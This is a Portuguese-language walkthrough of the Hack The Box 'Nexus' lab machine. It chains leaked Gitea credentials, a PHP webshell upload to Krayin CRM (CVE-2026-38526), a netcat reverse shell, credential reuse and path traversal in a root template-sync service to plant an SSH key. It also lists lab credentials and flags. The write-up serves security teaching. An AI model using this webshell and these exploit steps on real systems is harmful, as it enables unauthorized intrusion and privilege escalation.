
# Write-up da máquina Nexus do Hack The Box, cobrindo reconhecimento, descoberta de credenciais no Gitea, exploração do Krayin CRM via CVE-2026-38526, acesso inicial e escalonamento de privilégios por meio de um serviço vulnerável de sincronização de templates do Gitea.
Inglês 🇺🇸 | Espanhol 🇪🇸
Nexus é uma máquina Linux de dificuldade Fácil do Hack The Box que demonstra uma cadeia de ataque em múltiplas etapas envolvendo enumeração de hosts virtuais, credenciais expostas, funcionalidade vulnerável de aplicação web, execução remota de código, reutilização de credenciais e escalonamento local de privilégios.
Reconhecimento
│
▼
Enumeração de Hosts Virtuais
│
├── git.nexus.htb
└── billing.nexus.htb
│
▼
Histórico de Commits do Gitea
│
▼
Credenciais Expostas
│
▼
Login no Krayin CRM
│
▼
CVE-2026-38526
│
▼
Webshell PHP
│
▼
Reverse Shell
(www-data)
│
▼
.env da Aplicação
│
▼
SSH como jones
│
▼
gitea-template-sync
│
▼
Path Traversal
│
▼
Repositório Git Malicioso
│
▼
SSH como root
rootIP Alvo: 10.129.82.92
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92
22/tcp open ssh OpenSSH 9.6p1 Ubuntu
80/tcp open http nginx 1.24.0 (Ubuntu)
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain
git.nexus.htb → Gitea
billing.nexus.htb → Krayin CRM
Adicione os hosts descobertos ao /etc/hosts:
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts
Navegue até:
http://git.nexus.htb
Um repositório chamado:
admin/krayin-docker-setup
contém informações úteis no seu histórico do Git.
O arquivo .env pode ser recuperado de commits anteriores, revelando credenciais que não estão mais presentes na versão atual.
| Serviço | Nome de Usuário | Senha |
|---|---|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
O endereço de e-mail [email protected] também foi identificado na seção de empregos do site principal.
URL: http://billing.nexus.htb/admin/login
E-mail: [email protected]
Senha: N27xh!!2ucY04
Navegue até:
/admin/mail/sent
Em seguida:
O payload está armazenado em:
exploits/CVE-2026-38526/shell.php
Payload:
<?php system($_GET["cmd"]); ?>
Os campos multipart relevantes são:
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php
Após o envio bem-sucedido:
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id
Resultado esperado:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Inicie um listener:
nc -lvnp 4444
Em seguida, acione o reverse shell através do webshell enviado.
A implementação em Python está disponível em:
exploits/CVE-2026-38526/reverse_shell.py
Nesta etapa, o shell é obtido como:
www-data
Inspecione a configuração do Krayin:
cat /var/www/krayin/.env
Credenciais são encontradas:
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR
cat /etc/passwd | grep sh$
A conta jones é identificada.
Senha:
y27xb3ha!!74GbR
f20cbf9aeb6bb228d356a42ff49c1933
systemctl list-units | grep -i gitea
Os seguintes serviço e timer são identificados:
gitea-template-sync.timer
gitea-template-sync.service
O serviço é executado com privilégios elevados.
/etc/gitea/template-sync.py
O mecanismo de sincronização usa construção de caminhos que pode ser abusada através de path traversal.
Gere um par de chaves SSH:
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub
O exploit de manipulação de objetos Git está localizado em:
exploits/gitea_template_sync/exploit_git.py
Crie o repositório:
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit
git init
python3 exploit_git.py
O repositório deve usar o branch:
main
Gere um token de acesso pessoal através de:
http://git.nexus.htb
Navegue até:
Settings → Applications
Em seguida, configure o remote:
git remote set-url origin http://jones:[email protected]/jones/exploit.git
Envie o repositório malicioso:
git push -f origin main
Monitore o log de sincronização:
tail -f /var/log/template-sync.log
A sincronização bem-sucedida resulta no processamento da árvore Git maliciosa pelo serviço privilegiado.
Exemplo:
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30] synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete
Depois que a chave pública SSH for gravada na conta root:
ssh -i /tmp/nexus_root [email protected]
Verifique o acesso:
whoami
Esperado:
root
Recupere a flag de root:
cat /root/root.txt
85be1d2a3084e387da0e7dd118908c63
| Flag | Valor |
|---|---|
| User | f20cbf9aeb6bb228d356a42ff49c1933 |
| Root | 85be1d2a3084e387da0e7dd118908c63 |
Estas credenciais pertencem ao ambiente de laboratório do Hack The Box documentado por este repositório.
htb-labs-nexus/
├── README.md
├── exploits/
│ ├── CVE-2026-38526/
│ │ ├── shell.php
│ │ ├── reverse_shell.py
│ │ └── burp_request.txt
│ └── gitea_template_sync/
│ ├── exploit_git.py
│ ├── create_repo.sh
│ └── key.pub
├── scripts/
│ ├── linpeas.sh
│ ├── LinEnum.sh
│ └── enum_services.sh
├── assets/
│ ├── nmap_scan.txt
│ ├── gobuster_vhost.txt
│ └── credentials.txt
├── screenshots/
│ ├── gitea_repo.png
│ ├── crm_login.png
│ ├── webshell.png
│ └── root_flag.png
└── notes/
├── methodology.md
├── commands.md
└── credentials.md
Este repositório destina-se apenas a fins educacionais e testes de segurança autorizados.
As técnicas, credenciais, exploits e comandos documentados aqui não devem ser usados contra sistemas sem autorização explícita.
root pode se tornar um vetor de escalonamento de privilégios.⭐ Se você achou este write-up útil, considere dar uma estrela ao repositório.
| Serviço | Nome de Usuário | Senha / Chave |
|---|
| Krayin CRM | [email protected] | N27xh!!2ucY04 |
| Gitea | jones | N27xh!!2ucY04 |
| Token Gitea | jones | 1dd7105bf7e57cad02c5a56af5d92703a7839364 |
| SSH | jones | y27xb3ha!!74GbR |
| SSH Root | root | /tmp/nexus_root |
| Ferramenta | Finalidade |
|---|
| Nmap | Enumeração de portas e serviços |
| Gobuster | Enumeração de hosts virtuais |
| Burp Suite | Interceptação e modificação de requisições HTTP |
| Git | Análise de repositórios e construção de repositório malicioso |
| Python 3 | Scripts de exploração |
| Netcat | Listener de reverse shell |
| LinEnum | Enumeração Linux |
| LinPEAS | Enumeração de escalonamento de privilégios |
| SSH | Acesso remoto |